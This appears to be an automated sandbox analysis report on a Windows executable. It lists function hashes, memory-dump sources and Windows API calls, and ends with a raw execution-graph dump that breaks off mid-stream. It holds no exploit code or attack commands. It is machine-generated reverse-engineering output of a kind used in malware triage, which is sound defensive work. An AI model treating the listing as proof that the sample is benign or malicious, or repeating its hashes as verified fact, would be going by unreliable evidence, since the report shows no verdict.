                                                        • Associated: 00000000.00000002.1639127214.00007FF7F4DAD000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639127214.00007FF7F4DB6000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639173162.00007FF7F4DCC000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639173162.00007FF7F4E1E000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff7f4d60000_C792057CB761DA8872421A6C906C4481B260BDB5D27B8.jbxd
                                                        Similarity
                                                        • API ID: ByteCharEnvironmentMultiStringsWide$Free
                                                        • String ID:
                                                        • API String ID: 1557788787-0
                                                        • Opcode ID: 31d98922058b437aa39038ffcd2f921eb2876f5cb57b8945f77e4444b2cf6093
                                                        • Instruction ID: 9d6da311f79a3cbd7db774d29167f98f444a30d80f81ba44ba2cbe0709da6004
                                                        • Opcode Fuzzy Hash: 31d98922058b437aa39038ffcd2f921eb2876f5cb57b8945f77e4444b2cf6093
                                                        • Instruction Fuzzy Hash: 3F214321B1D75586E724AF13A880029B6A4FB44B90B884135DFADA3BD6DF3CE491C750
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • GetLastError.KERNEL32(?,?,?,00007FF7F4D8B340,?,?,00000050,00007FF7F4D8D381), ref: 00007FF7F4D9091A
                                                        • SetLastError.KERNEL32(?,?,?,00007FF7F4D8B340,?,?,00000050,00007FF7F4D8D381), ref: 00007FF7F4D90982
                                                        • SetLastError.KERNEL32(?,?,?,00007FF7F4D8B340,?,?,00000050,00007FF7F4D8D381), ref: 00007FF7F4D90998
                                                        • abort.LIBCMT ref: 00007FF7F4D9099E
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1639029163.00007FF7F4D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F4D60000, based on PE: true
                                                        • Associated: 00000000.00000002.1638976721.00007FF7F4D60000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639090059.00007FF7F4D9B000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639127214.00007FF7F4DAD000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639127214.00007FF7F4DB6000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639173162.00007FF7F4DCC000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639173162.00007FF7F4E1E000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff7f4d60000_C792057CB761DA8872421A6C906C4481B260BDB5D27B8.jbxd
                                                        Similarity
                                                        • API ID: ErrorLast$abort
                                                        • String ID:
                                                        • API String ID: 1447195878-0
                                                        • Opcode ID: d23b1ea948c8cc0bb87b14db0d81ebe09fd71346baca008a5f7c6a6520cdbb6e
                                                        • Instruction ID: 322ebc87d86641e53cb5ae6bf234616416c04d6d98440f8feb847a57bc1c93c6
                                                        • Opcode Fuzzy Hash: d23b1ea948c8cc0bb87b14db0d81ebe09fd71346baca008a5f7c6a6520cdbb6e
                                                        • Instruction Fuzzy Hash: 0C016111B0920753FB5ABF63EDD5178B1915F45780F881538DB7E827D6EE2CF80482A0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1639029163.00007FF7F4D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F4D60000, based on PE: true
                                                        • Associated: 00000000.00000002.1638976721.00007FF7F4D60000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639090059.00007FF7F4D9B000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639127214.00007FF7F4DAD000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639127214.00007FF7F4DB6000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639173162.00007FF7F4DCC000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639173162.00007FF7F4E1E000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff7f4d60000_C792057CB761DA8872421A6C906C4481B260BDB5D27B8.jbxd
                                                        Similarity
                                                        • API ID: CapsDevice$Release
                                                        • String ID:
                                                        • API String ID: 1035833867-0
                                                        • Opcode ID: 0607dc1d94c92cfa02f60fd2766947dea058399673a1dc8102f04d351872c6bf
                                                        • Instruction ID: 33374f08f681d7f23319330091a98cf7b833b7ae7402b7aab5e1a14c030a22a2
                                                        • Opcode Fuzzy Hash: 0607dc1d94c92cfa02f60fd2766947dea058399673a1dc8102f04d351872c6bf
                                                        • Instruction Fuzzy Hash: 64E0C960E1960287EF286F72E8A9275B191AF48B91F844039CB2E463D0ED3DA08546E0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1639029163.00007FF7F4D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F4D60000, based on PE: true
                                                        • Associated: 00000000.00000002.1638976721.00007FF7F4D60000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639090059.00007FF7F4D9B000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639127214.00007FF7F4DAD000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639127214.00007FF7F4DB6000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639173162.00007FF7F4DCC000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639173162.00007FF7F4E1E000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff7f4d60000_C792057CB761DA8872421A6C906C4481B260BDB5D27B8.jbxd
                                                        Similarity
                                                        • API ID: _invalid_parameter_noinfo
                                                        • String ID: e+000$gfff
                                                        • API String ID: 3215553584-3030954782
                                                        • Opcode ID: b0595cce0df0af71658d8d5e6ed85b764f27a28e19a233f7f6f9d231745c495e
                                                        • Instruction ID: 65b71d847daf80f7a645919568fbc8e3724c5978752b3bf5f077858b724cf9d0
                                                        • Opcode Fuzzy Hash: b0595cce0df0af71658d8d5e6ed85b764f27a28e19a233f7f6f9d231745c495e
                                                        • Instruction Fuzzy Hash: D051F262B187C297F7259E36D98036DBA95AB80B90F888231C7A887BD6CE3CD444C750
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1639029163.00007FF7F4D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F4D60000, based on PE: true
                                                        • Associated: 00000000.00000002.1638976721.00007FF7F4D60000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639090059.00007FF7F4D9B000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639127214.00007FF7F4DAD000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639127214.00007FF7F4DB6000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639173162.00007FF7F4DCC000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639173162.00007FF7F4E1E000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff7f4d60000_C792057CB761DA8872421A6C906C4481B260BDB5D27B8.jbxd
                                                        Similarity
                                                        • API ID: _invalid_parameter_noinfo_noreturn$swprintf
                                                        • String ID: SIZE
                                                        • API String ID: 449872665-3243624926
                                                        • Opcode ID: d0299518721ae56135b80f6d0b9407474becaff91557af36d9802fd85649bbcc
                                                        • Instruction ID: 48a90e874e7a7eb1cebff545352483e6aa2ba6e405d432649ef01b497453fcc2
                                                        • Opcode Fuzzy Hash: d0299518721ae56135b80f6d0b9407474becaff91557af36d9802fd85649bbcc
                                                        • Instruction Fuzzy Hash: CF41A462A18A8297EF10AF16E4C13BDB350FF867A4F905232E7AD066D6EE3CD540C750
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        Strings
                                                        • C:\Users\user\Desktop\C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exe, xrefs: 00007FF7F4D8F799
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1639029163.00007FF7F4D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F4D60000, based on PE: true
                                                        • Associated: 00000000.00000002.1638976721.00007FF7F4D60000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639090059.00007FF7F4D9B000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639127214.00007FF7F4DAD000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639127214.00007FF7F4DB6000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639173162.00007FF7F4DCC000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639173162.00007FF7F4E1E000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff7f4d60000_C792057CB761DA8872421A6C906C4481B260BDB5D27B8.jbxd
                                                        Similarity
                                                        • API ID: FileModuleName_invalid_parameter_noinfo
                                                        • String ID: C:\Users\user\Desktop\C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exe
                                                        • API String ID: 3307058713-2009292320
                                                        • Opcode ID: 32830429c5a0a6449ebe3119d6f4074da373c825f732ffc243a16f3f58d0938d
                                                        • Instruction ID: 51bc21b72ef0247237ed04348f6c54f100350c3940339863e4ce3b42de633d2a
                                                        • Opcode Fuzzy Hash: 32830429c5a0a6449ebe3119d6f4074da373c825f732ffc243a16f3f58d0938d
                                                        • Instruction Fuzzy Hash: 2A415272A0865687E715EF27E8800B8B7A5FB44BD4F944036EB1D47BD5EE3DE44183A0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1639029163.00007FF7F4D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F4D60000, based on PE: true
                                                        • Associated: 00000000.00000002.1638976721.00007FF7F4D60000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639090059.00007FF7F4D9B000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639127214.00007FF7F4DAD000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639127214.00007FF7F4DB6000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639173162.00007FF7F4DCC000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639173162.00007FF7F4E1E000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff7f4d60000_C792057CB761DA8872421A6C906C4481B260BDB5D27B8.jbxd
                                                        Similarity
                                                        • API ID: ByteCharMultiWide_snwprintf
                                                        • String ID: $%s$@%s
                                                        • API String ID: 2650857296-834177443
                                                        • Opcode ID: 18d1f9567af3e1e829b7edd42c7bfbbb79181edea22946e9fa38abe24f4e2d02
                                                        • Instruction ID: 7420976095a2ddcad02fa565ff6492ab9f9c488f6ce99a5dae86f09a742663b8
                                                        • Opcode Fuzzy Hash: 18d1f9567af3e1e829b7edd42c7bfbbb79181edea22946e9fa38abe24f4e2d02
                                                        • Instruction Fuzzy Hash: 7E31AE72618A4A96EB10AF17E4C06B9B3A4FB44788F800032EF1D17BD5DE3CE505C790
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1639029163.00007FF7F4D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F4D60000, based on PE: true
                                                        • Associated: 00000000.00000002.1638976721.00007FF7F4D60000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639090059.00007FF7F4D9B000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639127214.00007FF7F4DAD000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639127214.00007FF7F4DB6000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639173162.00007FF7F4DCC000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639173162.00007FF7F4E1E000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff7f4d60000_C792057CB761DA8872421A6C906C4481B260BDB5D27B8.jbxd
                                                        Similarity
                                                        • API ID: FileHandleType
                                                        • String ID: @
                                                        • API String ID: 3000768030-2766056989
                                                        • Opcode ID: b947de3923641d317ef8b4e62e77dc8d20735a47ca9ba61dc4d579ac66c9413a
                                                        • Instruction ID: 3b4d7f00c35b37004f34df21c38faa10522621fd5f986de32b8e3f29e0202deb
                                                        • Opcode Fuzzy Hash: b947de3923641d317ef8b4e62e77dc8d20735a47ca9ba61dc4d579ac66c9413a
                                                        • Instruction Fuzzy Hash: 7221A222B0864292FB649F26D8D4139B660FB45B74FA80735D7BE477D4CE3DD881C290
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • RtlPcToFileHeader.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF7F4D857AE), ref: 00007FF7F4D8784C
                                                        • RaiseException.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF7F4D857AE), ref: 00007FF7F4D87892
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1639029163.00007FF7F4D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F4D60000, based on PE: true
                                                        • Associated: 00000000.00000002.1638976721.00007FF7F4D60000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639090059.00007FF7F4D9B000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639127214.00007FF7F4DAD000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639127214.00007FF7F4DB6000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639173162.00007FF7F4DCC000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639173162.00007FF7F4E1E000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff7f4d60000_C792057CB761DA8872421A6C906C4481B260BDB5D27B8.jbxd
                                                        Similarity
                                                        • API ID: ExceptionFileHeaderRaise
                                                        • String ID: csm
                                                        • API String ID: 2573137834-1018135373
                                                        • Opcode ID: 13556f5c8cc8e57bd0135833ed3cb94125f61d8ee28d70f1e7400c7c27568873
                                                        • Instruction ID: a5031123363bdad0e9ad133830b2fdf2b5db14593a370eaa170d3e32a909f98f
                                                        • Opcode Fuzzy Hash: 13556f5c8cc8e57bd0135833ed3cb94125f61d8ee28d70f1e7400c7c27568873
                                                        • Instruction Fuzzy Hash: 5A115132608B8983EB109F16F880269B7A5FB88B88F984230DF9D07798DF3CD551CB40
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1639029163.00007FF7F4D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F4D60000, based on PE: true
                                                        • Associated: 00000000.00000002.1638976721.00007FF7F4D60000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639090059.00007FF7F4D9B000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639127214.00007FF7F4DAD000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639127214.00007FF7F4DB6000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639173162.00007FF7F4DCC000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1639173162.00007FF7F4E1E000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff7f4d60000_C792057CB761DA8872421A6C906C4481B260BDB5D27B8.jbxd
                                                        Similarity
                                                        • API ID: FindHandleModuleResource
                                                        • String ID: RTL
                                                        • API String ID: 3537982541-834975271
                                                        • Opcode ID: a45610fe9d42f5f181feef3a06741817b69cf11aeaebfa57cd0cb73b5dfd576c
                                                        • Instruction ID: 46708fc4906a45428b9332708255fdcfccde2087c3a9c118160af8f067e73394
                                                        • Opcode Fuzzy Hash: a45610fe9d42f5f181feef3a06741817b69cf11aeaebfa57cd0cb73b5dfd576c
                                                        • Instruction Fuzzy Hash: BDD01251F0660A93FF19AF63D88537466506B19B41F891038CA2D463D0EE6D909487A4
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Execution Graph

                                                        Execution Coverage:9.5%
                                                        Dynamic/Decrypted Code Coverage:0%
                                                        Signature Coverage:2.7%
                                                        Total number of Nodes:1505
                                                        Total number of Limit Nodes:44
                                                        execution_graph: interactive node/edge dump (1505 nodes, 44 limit nodes) omitted; only the API nodes it contains are kept below, grouped by the call chains they appear in.
                                                        • Delay-load helper (___delayLoadHelper2@8): GetModuleHandleW, GetProcAddress, LoadLibraryExA, LoadLibraryExW, FreeLibrary, GetLastError, RaiseException, VirtualQuery, GetSystemInfo, VirtualProtect (DloadProtectSection / DloadReleaseSectionWriteAccess)
                                                        • CRT startup and fail-fast (_abort, _ValidateLocalCookies, ___scrt_uninitialize_crt): IsProcessorFeaturePresent, IsDebuggerPresent, SetUnhandledExceptionFilter, UnhandledExceptionFilter, GetStartupInfoW, GetCommandLineA, GetCommandLineW, TlsAlloc, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection
                                                        • Process and environment: GetCurrentProcess, GetProcessAffinityMask, GetVersionExW, GetModuleFileNameW, SetEnvironmentVariableW, GetLocalTime, GetSystemTime, SystemTimeToFileTime, GetTickCount, SetThreadExecutionState, Sleep
                                                        • Dialog-based UI: DialogBoxParamW, EndDialog, GetDlgItem, GetDlgItemTextW, SetDlgItemTextW, SendDlgItemMessageW, SendMessageW, PeekMessageW, GetMessageW, IsDialogMessageW, TranslateMessage, DispatchMessageW, SetFocus, ShowWindow, EnableWindow, SetWindowTextW, GetWindowLongW, SetWindowLongW, GetWindow, GetClassNameW, FindWindowExW, GetClientRect, LoadStringW, LoadIconW, LoadBitmapW, GetObjectW, DeleteObject, GetDC, GetDeviceCaps, ReleaseDC, SHAutoComplete, SHGetMalloc, GlobalAlloc
                                                        • Shared-memory IPC and child launch: CreateFileMappingW, OpenFileMappingW, MapViewOfFile, UnmapViewOfFile, CloseHandle, ShellExecuteExW
                                                        • File and directory handling: CreateFileW, GetFileType, FlushFileBuffers, SetEndOfFile, SetFileTime, GetFileAttributesW, SetFileAttributesW, DeleteFileW, MoveFileW, MoveFileExW, CreateDirectoryW, GetCurrentDirectoryW, SetCurrentDirectoryW, ExpandEnvironmentStringsW, FindFirstFileW, FindNextFileW, FindClose, FindCloseChangeNotification
                                                        • String handling: CompareStringW, CharUpperW, WideCharToMultiByte, MultiByteToWideChar, VariantClear
InitializeCriticalSectionAndSpinCount 24872 d73d69 24871->24872 24872->24854 24873->24857 24875 d73c26 24874->24875 24876 d73c4f 24874->24876 24875->24876 24881 d73b72 24875->24881 24876->24871 24876->24872 24879 d73c3b GetProcAddress 24879->24876 24880 d73c49 24879->24880 24880->24876 24886 d73b7e ___vcrt_InitializeCriticalSectionEx 24881->24886 24882 d73bf3 24882->24876 24882->24879 24883 d73b95 LoadLibraryExW 24884 d73bb3 GetLastError 24883->24884 24885 d73bfa 24883->24885 24884->24886 24885->24882 24887 d73c02 FreeLibrary 24885->24887 24886->24882 24886->24883 24888 d73bd5 LoadLibraryExW 24886->24888 24887->24882 24888->24885 24888->24886 24890 d73c0d ___vcrt_InitializeCriticalSectionEx 5 API calls 24889->24890 24891 d73c71 24890->24891 24892 d73c8a TlsAlloc 24891->24892 24893 d72b96 24891->24893 24893->24862 24894 d73d08 6 API calls ___vcrt_InitializeCriticalSectionEx 24893->24894 24894->24864 24895->24862 24899 d7c077 24896->24899 24900 d7c073 24896->24900 24897 d6fbbc _ValidateLocalCookies 5 API calls 24898 d6eefe 24897->24898 24898->24773 24898->24852 24899->24900 24902 d7a6a0 24899->24902 24900->24897 24903 d7a6ac __FrameHandler3::FrameUnwindToState 24902->24903 24914 d7ac31 EnterCriticalSection 24903->24914 24905 d7a6b3 24915 d7c528 24905->24915 24907 d7a6c2 24913 d7a6d1 24907->24913 24928 d7a529 29 API calls 24907->24928 24910 d7a6cc 24929 d7a5df GetStdHandle GetFileType 24910->24929 24911 d7a6e2 _abort 24911->24899 24930 d7a6ed LeaveCriticalSection _abort 24913->24930 24914->24905 24916 d7c534 __FrameHandler3::FrameUnwindToState 24915->24916 24917 d7c541 24916->24917 24918 d7c558 24916->24918 24939 d791a8 20 API calls _abort 24917->24939 24931 d7ac31 EnterCriticalSection 24918->24931 24921 d7c546 24940 d79087 26 API calls ___std_exception_copy 24921->24940 24923 d7c590 24941 d7c5b7 LeaveCriticalSection _abort 24923->24941 24924 d7c550 _abort 24924->24907 24925 d7c564 24925->24923 24932 d7c479 24925->24932 24928->24910 24929->24913 24930->24911 
24931->24925 24933 d7b136 _abort 20 API calls 24932->24933 24935 d7c48b 24933->24935 24934 d7c498 24936 d78dcc _free 20 API calls 24934->24936 24935->24934 24937 d7af0a 11 API calls 24935->24937 24938 d7c4ea 24936->24938 24937->24935 24938->24925 24939->24921 24940->24924 24941->24924 24943 d6ec50 24942->24943 24944 d6086d GetModuleHandleW 24943->24944 24945 d60888 GetProcAddress 24944->24945 24947 d608e7 24944->24947 24948 d608a1 24945->24948 24949 d608b9 GetProcAddress 24945->24949 24946 d60c14 GetModuleFileNameW 24958 d60c32 24946->24958 24947->24946 25039 d775fb 42 API calls 2 library calls 24947->25039 24948->24949 24951 d608cb 24949->24951 24951->24947 24952 d60b54 24952->24946 24953 d60b5f GetModuleFileNameW CreateFileW 24952->24953 24954 d60b8f SetFilePointer 24953->24954 24955 d60c08 CloseHandle 24953->24955 24954->24955 24956 d60b9d ReadFile 24954->24956 24955->24946 24956->24955 24959 d60bbb 24956->24959 24961 d60c94 GetFileAttributesW 24958->24961 24962 d60cac 24958->24962 24964 d60c5d CompareStringW 24958->24964 25030 d5b146 24958->25030 25033 d6081b 24958->25033 24959->24955 24963 d6081b 2 API calls 24959->24963 24961->24958 24961->24962 24965 d60cb7 24962->24965 24968 d60cec 24962->24968 24963->24959 24964->24958 24967 d60cd0 GetFileAttributesW 24965->24967 24970 d60ce8 24965->24970 24966 d60dfb 24990 d6a64d GetCurrentDirectoryW 24966->24990 24967->24965 24967->24970 24968->24966 24969 d5b146 GetVersionExW 24968->24969 24971 d60d06 24969->24971 24970->24968 24972 d60d73 24971->24972 24973 d60d0d 24971->24973 24974 d54092 _swprintf 51 API calls 24972->24974 24975 d6081b 2 API calls 24973->24975 24976 d60d9b AllocConsole 24974->24976 24977 d60d17 24975->24977 24978 d60df3 ExitProcess 24976->24978 24979 d60da8 GetCurrentProcessId AttachConsole 24976->24979 24980 d6081b 2 API calls 24977->24980 25040 d73e13 24979->25040 24982 d60d21 24980->24982 24984 d5e617 53 API calls 24982->24984 24983 d60dc9 GetStdHandle WriteConsoleW Sleep FreeConsole 24983->24978 
24985 d60d3c 24984->24985 24986 d54092 _swprintf 51 API calls 24985->24986 24987 d60d4f 24986->24987 24988 d5e617 53 API calls 24987->24988 24989 d60d5e 24988->24989 24989->24978 24990->24790 24992 d6081b 2 API calls 24991->24992 24993 d6ac2a OleInitialize 24992->24993 24994 d6ac4d GdiplusStartup SHGetMalloc 24993->24994 24994->24792 24996 d6b6fe 24995->24996 24997 d6b70b GetObjectW 24995->24997 25042 d6a6c2 FindResourceW 24996->25042 24998 d6b71a 24997->24998 25000 d6a5c6 4 API calls 24998->25000 25002 d6b72d 25000->25002 25003 d6b770 25002->25003 25004 d6b74c 25002->25004 25005 d6a6c2 12 API calls 25002->25005 25014 d5da42 25003->25014 25056 d6a605 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 25004->25056 25007 d6b73d 25005->25007 25007->25004 25009 d6b743 DeleteObject 25007->25009 25008 d6b754 25057 d6a5e4 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 25008->25057 25009->25004 25011 d6b75d 25058 d6a80c 8 API calls 25011->25058 25013 d6b764 DeleteObject 25013->25003 25067 d5da67 25014->25067 25019 d690b7 25020 d6eb38 8 API calls 25019->25020 25021 d690d6 25020->25021 25021->24814 25023 d6acab GdiplusShutdown OleUninitialize 25022->25023 25023->24830 25025->24799 25026->24815 25027->24794 25028->24821 25029->24828 25031 d5b196 25030->25031 25032 d5b15a GetVersionExW 25030->25032 25031->24958 25032->25031 25034 d6ec50 25033->25034 25035 d60828 GetSystemDirectoryW 25034->25035 25036 d60840 25035->25036 25037 d6085e 25035->25037 25038 d60851 LoadLibraryW 25036->25038 25037->24958 25038->25037 25039->24952 25041 d73e1b 25040->25041 25041->24983 25041->25041 25043 d6a6e5 SizeofResource 25042->25043 25044 d6a7d3 25042->25044 25043->25044 25045 d6a6fc LoadResource 25043->25045 25044->24997 25044->24998 25045->25044 25046 d6a711 LockResource 25045->25046 25046->25044 25047 d6a722 GlobalAlloc 25046->25047 25047->25044 25048 d6a73d GlobalLock 25047->25048 25049 d6a7cc GlobalFree 25048->25049 25050 d6a74c __InternalCxxFrameHandler 25048->25050 25049->25044 25051 d6a7c5 
GlobalUnlock 25050->25051 25059 d6a626 GdipAlloc 25050->25059 25051->25049 25054 d6a7b0 25054->25051 25055 d6a79a GdipCreateHBITMAPFromBitmap 25055->25054 25056->25008 25057->25011 25058->25013 25060 d6a645 25059->25060 25061 d6a638 25059->25061 25060->25051 25060->25054 25060->25055 25063 d6a3b9 25061->25063 25064 d6a3e1 GdipCreateBitmapFromStream 25063->25064 25065 d6a3da GdipCreateBitmapFromStreamICM 25063->25065 25066 d6a3e6 25064->25066 25065->25066 25066->25060 25068 d5da75 __EH_prolog 25067->25068 25069 d5daa4 GetModuleFileNameW 25068->25069 25070 d5dad5 25068->25070 25071 d5dabe 25069->25071 25113 d598e0 25070->25113 25071->25070 25073 d5db31 25124 d76310 25073->25124 25074 d5959a 80 API calls 25076 d5da4e 25074->25076 25111 d5e29e GetModuleHandleW FindResourceW 25076->25111 25077 d5db44 25079 d76310 26 API calls 25077->25079 25078 d5db05 25078->25073 25080 d5e261 78 API calls 25078->25080 25091 d5dd4a 25078->25091 25088 d5db56 ___vcrt_InitializeCriticalSectionEx 25079->25088 25080->25078 25081 d5dc85 25081->25091 25144 d59d70 81 API calls 25081->25144 25083 d59e80 79 API calls 25083->25088 25085 d5dc9f ___std_exception_copy 25086 d59bd0 82 API calls 25085->25086 25085->25091 25089 d5dcc8 ___std_exception_copy 25086->25089 25088->25081 25088->25083 25088->25091 25138 d59bd0 25088->25138 25143 d59d70 81 API calls 25088->25143 25089->25091 25108 d5dcd3 _wcslen ___std_exception_copy ___vcrt_InitializeCriticalSectionEx 25089->25108 25145 d61b84 MultiByteToWideChar 25089->25145 25091->25074 25092 d5e159 25097 d5e1de 25092->25097 25151 d78cce 26 API calls ___std_exception_copy 25092->25151 25095 d5e16e 25152 d77625 26 API calls ___std_exception_copy 25095->25152 25096 d5e214 25102 d76310 26 API calls 25096->25102 25097->25096 25101 d5e261 78 API calls 25097->25101 25099 d5e1c6 25153 d5e27c 78 API calls 25099->25153 25101->25097 25103 d5e22d 25102->25103 25104 d76310 26 API calls 25103->25104 25104->25091 25106 d61da7 WideCharToMultiByte 25106->25108 25108->25091 
25108->25092 25108->25106 25146 d5e5b1 50 API calls __vsnprintf 25108->25146 25147 d76159 26 API calls 3 library calls 25108->25147 25148 d78cce 26 API calls ___std_exception_copy 25108->25148 25149 d77625 26 API calls ___std_exception_copy 25108->25149 25150 d5e27c 78 API calls 25108->25150 25112 d5da55 25111->25112 25112->25019 25114 d598ea 25113->25114 25115 d5994b CreateFileW 25114->25115 25116 d5996c GetLastError 25115->25116 25120 d599bb 25115->25120 25117 d5bb03 GetCurrentDirectoryW 25116->25117 25118 d5998c 25117->25118 25119 d59990 CreateFileW GetLastError 25118->25119 25118->25120 25119->25120 25121 d599b5 25119->25121 25122 d599e5 SetFileTime 25120->25122 25123 d599ff 25120->25123 25121->25120 25122->25123 25123->25078 25125 d76349 25124->25125 25126 d7634d 25125->25126 25137 d76375 25125->25137 25154 d791a8 20 API calls _abort 25126->25154 25128 d76352 25155 d79087 26 API calls ___std_exception_copy 25128->25155 25130 d6fbbc _ValidateLocalCookies 5 API calls 25132 d766a6 25130->25132 25131 d7635d 25133 d6fbbc _ValidateLocalCookies 5 API calls 25131->25133 25132->25077 25135 d76369 25133->25135 25135->25077 25136 d76699 25136->25130 25137->25136 25156 d76230 5 API calls _ValidateLocalCookies 25137->25156 25139 